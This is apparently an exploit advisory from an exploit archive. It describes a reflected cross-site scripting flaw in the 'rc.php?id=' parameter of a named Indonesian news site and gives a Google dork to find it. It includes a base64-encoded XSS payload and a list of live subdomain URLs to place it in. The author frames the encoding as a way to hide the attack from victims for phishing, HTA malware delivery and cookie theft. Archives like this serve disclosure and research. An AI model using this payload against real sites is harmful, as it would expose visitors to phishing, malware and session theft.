Custom CMS Okezone - Cross-Site Scripting Vulnerabilities

2021.04.09
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################################################# # Exploit Title: Custom CMS Okezone - Cross-Site Scripting Vulnerabilities # Exploit Author: Gh05t666nero # Author Team: IndoGhostSec # Google Dork: site:*.okezone.com/rc.php?id= # Software Vendor: allinurl:okezone.com/rc.php?id= # Software Version: N/A # Software Link: N/A # Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux # Date: 2021-04-09 ############################################################# [*] Information: ════════════════ XSS vulnerability in this time is a little different because we have to encrypt the XSS Payload to Base64 so that this can be an opportunity for a hacker to cover up the user's suspicions when he (the hacker) wants to execute his target, whether it's Spread Phishing, installing HTA malware, stealing cookies, and etc. ############################################################# [*] Exploit: ════════════ WFNTLSstR2gwNXQ2NjZuZXJvPC90aXRsZT48aW1nIG9uZXJyb3I9ImxvY2F0aW9uPSdqYXZhc2NyaXB0Olx4MjU1Q3UwMDYxbGVydChkb2N1bWVudC5kb21haW4pJyIgc3JjPSJ4IiA+ ############################################################# [*] Demo: ═════════ https://sports.okezone.com/rc.php?id=[EXPLOIT] https://economy.okezone.com/rc.php?id=[EXPLOIT] https://lifestyle.okezone.com/rc.php?id=[EXPLOIT] https://celebrity.okezone.com/rc.php?id=[EXPLOIT] https://techno.okezone.com/rc.php?id=[EXPLOIT] https://news.okezone.com/rc.php?id=[EXPLOIT] https://otomotif.okezone.com/rc.php?id=[EXPLOIT] https://lifestyle.okezone.com/rc.php?id=[EXPLOIT] https://travel.okezone.com/rc.php?id=[EXPLOIT] https://video.okezone.com/rc.php?id=[EXPLOIT] https://muslim.okezone.com/rc.php?id=[EXPLOIT] ############################################################# [*] Contact: ════════════ # Instagram: instagram.com/ojan.py # Telegram : t.me/Gh05t666nero # Twitter: twitter.com/Gh05t666nero1 # E-mail : anoncentraI@pm.me


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top